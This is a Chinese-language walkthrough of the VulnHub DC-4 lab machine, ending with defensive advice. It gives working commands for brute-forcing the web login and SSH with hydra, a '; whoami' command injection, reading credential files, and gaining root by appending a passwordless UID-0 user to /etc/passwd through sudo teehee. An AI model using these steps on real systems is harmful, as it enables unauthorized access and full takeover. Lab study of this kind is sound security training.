VnlnHub DC-4
字数 926 2025-08-12 11:34:30
DC-4 靶场渗透测试详细教学文档
一、靶场环境搭建
-
下载镜像:
- 从VnlnHub获取DC-4的.OVA格式镜像文件
- 直接导入VMware Workstation,指定解压位置
-
网络配置:
- 选择NAT网络模式
- 确保与Kali攻击机在同一网段
-
启动靶机:
- 导入完成后直接启动虚拟机
- 靶场搭建完成,无需额外配置
二、信息收集
-
发现目标IP:
nmap -sP -T4 192.168.48.0/24- 扫描结果:192.168.48.140(靶机)
-
端口扫描:
nmap -sS -A -p 1-65535 192.168.48.140- 开放端口:
- 22/tcp - SSH服务
- 80/tcp - HTTP服务
- 开放端口:
三、Web应用渗透
-
Web界面分析:
- 访问http://192.168.48.140
- 发现登录表单
-
爆破登录凭证:
- 使用Burp Suite抓取登录请求
- 发送到Intruder模块进行爆破
- 成功爆破出密码:
happy
-
命令注入漏洞:
- 登录后发现命令执行功能
- 抓包分析发现可修改命令参数
- 尝试执行任意命令:
; whoami - 确认当前用户为普通权限
四、横向移动
-
枚举系统用户:
cat /etc/passwd ls -l /home- 发现用户:charles、jim、sam
-
发现密码字典:
cat /home/jim/backups/old-passwords.bak- 获取潜在密码列表
-
SSH爆破:
hydra -L dc4user.txt -P dc4pass.TXT 192.168.48.140 ssh- 成功爆破出凭证:jim/jibril04
-
获取charles密码:
- 登录jim账户后检查邮件:
cat /var/mail/jim - 发现charles的密码
- 登录jim账户后检查邮件:
五、权限提升
-
检查sudo权限:
sudo -l- 发现特权命令:
teehee
- 发现特权命令:
-
teehee命令利用:
- 查看帮助信息:
teehee --help - 发现
-a参数可追加文件内容
- 查看帮助信息:
-
创建特权用户:
echo "qwe::0:0:::/bin/bash" | sudo teehee -a /etc/passwd- 添加UID为0的特权用户qwe
-
获取root权限:
su qwe- 成功切换为root用户
六、获取flag
cd /root
cat flag.txt
七、总结与安全建议
-
漏洞总结:
- 弱密码策略
- Web应用命令注入漏洞
- 不安全的sudo配置
- 敏感信息泄露(密码字典、邮件)
-
防御建议:
- 实施强密码策略
- 对用户输入进行严格过滤
- 限制sudo权限
- 定期检查系统敏感文件权限
- 避免在邮件中存储敏感凭证
-
渗透测试方法论:
- 信息收集 → 漏洞发现 → 初始访问 → 权限提升 → 目标达成
- 注意利用现有信息进行横向移动(如发现的密码字典)
本教程详细记录了DC-4靶场的完整渗透过程,涵盖了从信息收集到最终获取root权限的所有关键步骤,可作为Linux系统渗透测试的典型案例学习。